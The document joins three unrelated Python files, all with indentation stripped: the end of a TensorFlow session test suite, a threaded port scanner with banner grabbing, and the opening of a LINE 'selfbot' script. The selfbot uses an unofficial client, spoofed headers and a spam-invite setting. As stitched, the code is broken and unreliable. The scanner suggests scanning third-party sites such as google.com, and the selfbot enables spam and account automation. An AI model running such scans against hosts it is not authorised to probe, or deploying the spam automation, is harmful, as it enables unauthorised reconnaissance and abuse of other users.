feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(
constant_op.constant(1.0), options=None, run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0), options=run_options, run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
# TODO(nolivia): C API doesn't yet handle marking nodes as not feedable.
if ops._USE_C_API:
return
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/device:GPU:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(
d,
feed_dict={a: 1.0},
options=run_options,
run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegexp(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.test_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(
squared_tensor, feed_dict={
squared_tensor: np1 * np1
})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
# Passing the config to the server, but not the session should still result
# in logging device placement.
config = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
sess.run(c)
# Ensure that we did log device placement.
self.assertTrue('/job:local/replica:0/task:0/device:CPU:0' in str(log),
str(log))
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target, config=config) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def testDefaultServerTimeout(self):
# Test that the default server config timeout gets used when no Session
# config is provided.
config = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server(config=config)
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
with session.Session(server.target) as sess:
# Intentionally do not run any enqueue_ops so that dequeue will block
# until operation_timeout_in_ms.
with self.assertRaises(errors.DeadlineExceededError):
sess.run(dequeued_t)
def runTestBuildGraphError(self, sess):
# Ensure that errors from building the graph get propagated.
data = array_ops.placeholder(dtypes.float32, shape=[])
# pylint: disable=protected-access
enter_1 = gen_control_flow_ops._enter(data, 'foo_1', False)
enter_2 = gen_control_flow_ops._enter(data, 'foo_2', False)
# pylint: enable=protected-access
res = math_ops.add(enter_1, enter_2)
with self.assertRaisesOpError('has inputs from different frames'):
sess.run(res, feed_dict={data: 1.0})
def testBuildGraphErrorDirect(self):
self.runTestBuildGraphError(session.Session())
def testBuildGraphErrorDist(self):
server = server_lib.Server.create_local_server()
self.runTestBuildGraphError(session.Session(server.target))
def testDeviceAttributes(self):
attrs = session._DeviceAttributes(
'/job:worker/replica:0/task:3/device:CPU:2', 'TYPE', 1337)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:2', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def testDeviceAttributesCanonicalization(self):
attrs = session._DeviceAttributes('/job:worker/replica:0/task:3/cpu:1',
'TYPE', 1337)
self.assertEqual(1337, attrs.memory_limit_bytes)
self.assertEqual('/job:worker/replica:0/task:3/device:CPU:1', attrs.name)
self.assertEqual('TYPE', attrs.device_type)
str_repr = '%s' % attrs
self.assertTrue(str_repr.startswith('_DeviceAttributes'), str_repr)
def runTestAddFunctionToSession(self, target=''):
"""Add a function to a session after the graph has already been run."""
@function.Defun(dtypes.float32)
def foo(x):
return x + 1
x = constant_op.constant(1.0)
with session.Session(target=target) as sess:
sess.run(x)
f = foo(x)
result = sess.run(f)
self.assertEqual(result, 2.0)
def testAddFunctionToSession(self):
self.runTestAddFunctionToSession()
def testAddFunctionToGrpcSession(self):
server = server_lib.Server.create_local_server()
self.runTestAddFunctionToSession(server.target)
def testOpenAndCloseGrpcSession(self):
server = server_lib.Server.create_local_server()
with session.Session(server.target):
pass
def testOpenAndCloseSession(self):
with session.Session():
pass
def testAutoConvertAndCheckData(self):
with self.test_session() as sess:
a = array_ops.placeholder(dtype=dtypes.string)
with self.assertRaisesRegexp(
TypeError, 'Type of feed value 1 with type <(\w+) \'int\'> is not'):
sess.run(a, feed_dict={a: 1})
class GraphMutationTest(test_util.TensorFlowTestCase):
def setUp(self):
self._original_use_c_api_value = ops._USE_C_API
ops._USE_C_API = True
super(GraphMutationTest, self).setUp()
def tearDown(self):
ops._USE_C_API = self._original_use_c_api_value
super(GraphMutationTest, self).tearDown()
def testUpdateInputAfterRunning(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess:
self.assertAllEqual(3.0, sess.run(c))
c.op._update_input(1, a) # pylint: disable=protected-access
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by updating input tensor after it was run'):
sess.run(c)
# Check that running the graph with a new session is fine
with session.Session(graph=g) as sess2:
self.assertAllEqual(2.0, sess2.run(c))
def testSetDeviceAfterRunning(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess:
self.assertAllEqual(3.0, sess.run(c))
c.op._set_device('/cpu:0') # pylint: disable=protected-access
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by setting device after it was run'):
sess.run(c)
def testSetAttrAfterRunning(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0, dtype=dtypes.float32)
b = math_ops.cast(a, dtypes.float64)
with session.Session(graph=g) as sess:
self.assertAllEqual(1.0, sess.run(b))
b.op._set_attr('DstT', attr_value_pb2.AttrValue(type=types_pb2.DT_FLOAT))
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'Cast.*was changed by setting attribute after it was run'):
sess.run(b)
def testRunModifyRun(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess:
self.assertAllEqual(3.0, sess.run(c))
d = b + c
d.op._update_input(0, a) # pylint: disable=protected-access
self.assertAllEqual(3.0, sess.run(c))
self.assertAllEqual(4.0, sess.run(d))
def testRunModifyRunTwoSessions(self):
with ops.Graph().as_default() as g:
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(3.0, sess1.run(c))
self.assertAllEqual(3.0, sess2.run(c))
d = b + c
d.op._update_input(0, a) # pylint: disable=protected-access
self.assertAllEqual(3.0, sess2.run(c))
self.assertAllEqual(4.0, sess2.run(d))
d.op._update_input(0, b) # pylint: disable=protected-access
self.assertAllEqual(3.0, sess1.run(c))
self.assertAllEqual(5.0, sess1.run(d))
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by updating input tensor after it was run'):
sess2.run(c)
def testTwoSessionsOneRunBeforeModification(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
sess1.run(c)
c.op._set_device('/cpu:0') # pylint: disable=protected-access
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by setting device after it was run'):
sess1.run(c)
# sess2 was not run before modification
self.assertAllEqual(3.0, sess2.run(c))
def testTwoSessionsBothRunBeforeModification(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0)
b = constant_op.constant(2.0)
c = a + b
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
sess1.run(c)
sess2.run(c)
c.op._set_device('/cpu:0') # pylint: disable=protected-access
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by setting device after it was run'):
sess1.run(c)
with self.assertRaisesRegexp(
errors.FailedPreconditionError,
'add.*was changed by setting device after it was run'):
sess2.run(c)
if __name__ == '__main__':
googletest.main()
|
main.py
|
import socket
# python3 -m pip install IPy
from IPy import IP
from threading import Thread
"""
This is a basic port scanner, when you run it you will be asked for 3 inputs:
Enter target(s) to scan (split targets with ','):
These are the targets, an example could be:
google.com, 192.168.1.1, facebook.com
[OPTIONAL] Timeout (seconds):
This is the timeout, the higher the timeout the more accurate the results. The default timeout is (number of targets * 3) seconds
For higher accuracy I'd recommend setting it to (number of targets * 10)... This will take a lot longer but will return better results
Ports:
These are the ports you want to scan, an example of this would be:
70-80, 100, 119-122
The above input will result in ports 70, 71, 72, 73, 75, 76, 77, 78, 79, 80, 100, 119, 120, 121, 122 to be scanned
I tried my best to add threads, I'm still fairly new to the topic tho :)
"""
def check_ip(ipaddress: str):
"""
This function will attempt to convert a domain name to an IP address. If an invalid domain was
entered then it will return False and provide an error message.
"""
if ipaddress == "":
print("No IP address or domain was provided")
return False
try:
IP(ipaddress) # check if it's an IP address, throw a valueerror if not
return ipaddress
except ValueError: # if a domain name was entered
try:
# converts domain name to IP address (google.com -> 172.217.170.14)
return socket.gethostbyname(ipaddress)
except socket.gaierror:
print("Domain specified is invalid")
return False
def scan_port(target: str, port: int, timeout: float) -> None:
"""
This function will scan a given port for an IP Address and print out if the port is open or closed.
The default timeout is (the number of targets * 3) seconds, you can remove the timeout by setting it to 0 or less. Note that
the higher the timeout the more accurate the scan will be, but the longer it will take.
"""
target = target.strip()
converted_ip = check_ip(target)
try:
sock = socket.socket()
if timeout < 0.1:
print("Timeout is too short")
return
sock.settimeout(timeout)
if converted_ip: # only scan the ports if valid info was added
sock.connect((converted_ip, port))
try:
banner = sock.recv(1024)
print(f"[{target}]\tOpen port {port} :", banner.decode().strip('\n'))
except socket.timeout:
print(f"[{target}]\tOpen port {port}")
except:
pass
def scan(targets: tuple, ports: list, timeout=5) -> None:
"""
targets: the IP or domain of the target(s) in tuple form eg: ("google.com", "192.168.1.1")
ports: list of ports to scan
timeout: when to stop waiting for response (the higher the timeout the more accurate the results)
This function will scan the targets and their ports.
"""
print(f"Timeout: {timeout} seconds")
print()
scan_ports = []
for i in ports:
if '-' in i:
begin_port, end_port = tuple(i.split("-"))
[scan_ports.append(j) for j in range(int(begin_port.strip()), int(end_port.strip()) + 1)]
else:
scan_ports.append(int(i.strip()))
threads = []
try:
for target in targets:
for port in scan_ports:
threads.append(Thread(target=scan_port, args=(target, port, float(timeout))))
except TypeError: # a type error happens when this ("google.com",) is inserted
pass
else:
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
targets = input("Enter target(s) to scan (split targets with ','): ")
timeout = input("Timeout (seconds): ")
ports = input("Ports (example: 75-80, 112, 115-117): ")
# targets = "192.168.1.1, google.com, facebook.com"
# timeout = ""
# ports = "50-80, 120"
if not (targets.strip() == "") and not (ports.strip() == ""):
if ',' in targets:
scan(tuple(targets.split(',')), timeout=(float(timeout) if not timeout.strip() == "" else len(targets.split(',')) * 3), ports=ports.split(","))
else:
scan(tuple([targets]), timeout=(float(timeout) if not timeout.strip() == "" else len(targets.split(',')) * 3), ports=ports.split(","))
else:
print("Invalid target or ports")
|
sbonly.py
|
# -*- coding: utf-8 -*-
from thrift.transport import TTransport,TSocket,THttpClient,TTransport,TZlibTransport
from thrift.protocol import TCompactProtocol,TMultiplexedProtocol,TProtocol
from thrift.server import THttpServer,TServer,TProcessPoolServer
import lineX
from lineX import *
from akad.ttypes import *
from thrift.Thrift import *
from thrift.TMultiplexedProcessor import *
from thrift.TSerialization import *
from thrift.TRecursive import *
from thrift.protocol import TCompactProtocol
from thrift import transport, protocol, server
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re,os,subprocess,asyncio
from datetime import datetime, timedelta
from threading import Thread
from time import sleep
from bs4 import BeautifulSoup
from humanfriendly import format_timespan, format_size, format_number, format_length
import time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, pytz, urllib, urllib.parse,youtube_dl,pafy,timeit,atexit,traceback,ffmpy,humanize
from googletrans import Translator
from ttypes import LoginRequest
import json, requests, LineService
from thrift.transport import THttpClient
#========================================================================
_session = requests.session()
botStart = time.time()
print("LOGIN INDUK")
cl = LINE("")
cl.log("Auth Token : " + str(cl.authToken))
print("\nɪɴᴇxʙᴏᴛs.ʟɪɴᴇ ᴠᴇʀ.8.14.2 ᴘʀᴏᴛᴇᴄᴛ \n__________________________")
"""
ɪɴᴇxʙᴏᴛs.ʟɪɴᴇ ᴠᴇʀ.8.14.2 ᴘʀᴏᴛᴇᴄᴛ
"""
print("login success")
oepoll = OEPoll(cl)
call = cl
creator = ["u133f7110dd00e635f0776957837055a2"]
owner = ["u133f7110dd00e635f0776957837055a2"]
admin = ["u133f7110dd00e635f0776957837055a2"]
staff = ["u133f7110dd00e635f0776957837055a2"]
#☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤☠•➤
mid = cl.getProfile().mid
KAC = [cl]
ABC = [cl]
Bots = [mid]
Denjaka = admin + staff
protectqr = []
protectkick = []
protectjoin = []
protectinvite = []
protectcancel = []
protectantijs = []
ghost = []
msg_dict = {}
msg_dict1 = {}
offbot = []
welcome = []
#☠•➤☠•➤☠•➤☠•INEX KILLERS➤☠•➤☠•➤☠•➤☠•➤☠•➤
nama1 = 'InexBots'
Headers3 = {
'User-Agent': "CHROMEOS\t9.0.3Bot-Eater\t17.09",
'X-Line-Application': "CHROMEOS 1.7.14 BotEater x64",
"x-lal": "ja-US_US",
}
#☠•➤☠•➤☠•➤☠•INEX KILLERS FAMS➤☠•➤☠•➤☠•➤☠•➤☠•➤
settings = {
"autoBlock": False,
"autoRead": False,
"welcome": False,
"leave": False,
"mid": False,
"replySticker": False,
"stickerOn": False,
"checkContact": False,
"postEndUrl": True,
"checkPost": False,
"setKey": False,
"restartPoint": False,
"checkSticker": False,
"userMentioned": False,
"listSticker": False,
"messageSticker": False,
"changeGroupPicture": [],
"keyCommand": "",
"AddstickerTag": {
"sid": "",
"spkg": "",
"status": False
},
"Addsticker":{
"name": "",
"status":False
},
"stk":{},
"stickerset": {
"STKID":"",
"STKVER":"",
"STKPKGID":"",
"status": False
},
"selfbot":True,
"Images":{},
"Img":{},
"Addimage":{
"name": "",
"status":False
},
"Videos":{},
"Addaudio":{
"name": "",
"status":False
},
"Addvideo":{
"name": "",
"status":False
},
"myProfile": {
"displayName": "",
"coverId": "",
"pictureStatus": "",
"statusMessage": ""
},
"mimic": {
"copy": False,
"status": False,
"target": {}
},
"unsendMessage": False,
"Picture":False,
"group":{},
"groupPicture":False,
"changePicture":False,
"changeProfileVideo": False,
"ChangeVideoProfilevid":{},
"ChangeVideoProfilePicture":{},
"autoJoinTicket":False,
"SpamInvite":False,
"displayName": "",
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.200.32.99 Safari/537.36"
]
}
wait = {
"limit": 2,
"owner":{},
"admin":{},
"Timeline":False,
"addadmin":False,
"delladmin":False,
"staff":{},
"denjaka":{},
"likeOn": True,
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":True,
"contact":False,
"autoJoin":True,
"autoAdd":True,
"autoCancel":{"on":True, "members":1},
"autoLeave":False,
"autoLeave1":False,
"detectMention":False,
"detectMention2":False,
"arespon":False,
"Mentionkick":False,
"welcomeOn":False,
"sticker":False,
"unsend":True,
"selfbot":True,
"link1": "Chrome 1",
"link2": "Ios 1",
"link3": "Win 1",
"autoJoinMessage": "ᴛᴇʀɪᴍᴀᴋᴀsɪʜ ᴋᴀᴋᴀ ᴀᴛᴀs ᴜɴᴅᴀɴɢᴀɴ ɢʀᴜᴘɴʏᴀ.",
"comment1": "ᴀᴜᴛᴏ ʟɪᴋᴇ ɴ ᴄᴏᴍᴍᴇɴᴛ ᴅᴏɴᴇ\nвʏ.ᴛᴇᴀᴍ ⊶ ɪɴᴇxʙᴏᴛs ⊷ \nline.me/ti/p/~denjaka-inexx",
"comment2": "╭━━━━━━━━━━━━━━━━━━━━━━━━\n┃ ╔══════════════════━━━━╮\n┃ ║ ❀ BY BOT : INEXBOTS ❀\n┃ ╚══════════════════━━━━╯\n├━━━━━━━━━━━━━━━━━━━━━━━━\n┃ ╔══════════════════━━━━╮\n┃ ║ ❀ LIKE DONE \n┃ ║ ❀ COMMENT DONE \n┃ ║ ❀ INEXBOTS_TEAM\n┃ ╚══════════════════━━━━╯\n├━━━━━━━━━━━━━━━━━━━━━━━━\n┃ ╔══════════════════━━━━╮\n┃ ║ http://line.me/ti/p/~denjaka-inexx\n┃ ╚══════════════════━━━━╯\n╰━━━━━━━━━━━━━━━━━━━━━━━━",
"mention":"ᴋᴀʟᴏ ɴɢɪɴᴛɪᴘ ᴛᴇʀᴜs ᴅᴀᴘᴇᴛ ɢᴇʟᴀs ᴘᴇᴄᴀʜ ᴅɪ ᴋᴇᴘᴀʟᴀ...",
"Respontag":"ᴊᴀɴɢᴀɴ ᴛᴀɢ ʙᴀᴇ ᴋᴀᴋ,,, ɴɢᴏᴍᴏɴɢ ᴀᴊᴀ ᴋᴀʟᴏ ᴄɪɴᴛᴀ ᴀᴋᴜ ᴍᴀʜ.",
"Respontag2":"ᴊᴀɴɢᴀɴ ᴛᴀɢ ʙᴀᴇ ᴋᴀᴋ,,, ɴɢᴏᴍᴏɴɢ ᴀᴊᴀ ᴋᴀʟᴏ ᴄɪɴᴛᴀ ᴀᴋᴜ ᴍᴀʜ.",
"Responpm":"maaf,,, Ada apa kak tag saya di grup!",
"welcome":"丂乇ㄥ卂爪卂ㄒ 乃乇尺Ꮆ卂乃ㄩ几Ꮆ Ҝ卂Ҝ,,, 丂乇爪ㄖᎶ卂 乃乇ㄒ卂卄",
"commentPost":"ᴀᴜᴛᴏ ʟɪᴋᴇ ɴ ᴄᴏᴍᴍᴇɴᴛ ᴅᴏɴᴇ\nвʏ.ᴛᴇᴀᴍ ⊶ ɪɴᴇxʙᴏᴛs ⊷ \nline.me/ti/p/~denjaka-inexx",
"message":"тᴇяıмᴀ кᴀsıн suᴅᴀн ᴀᴅᴅ sᴀʏᴀ \nвʏ.ᴛᴇᴀᴍ ⊶ ɪɴᴇxʙᴏᴛs ⊷ \nline.me/ti/p/~denjaka-inexx"
}
protect = {
"pqr":[],
"pinv":[],
"proall":[],
"protect":[]
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
jakaProfile = cl.getProfile()
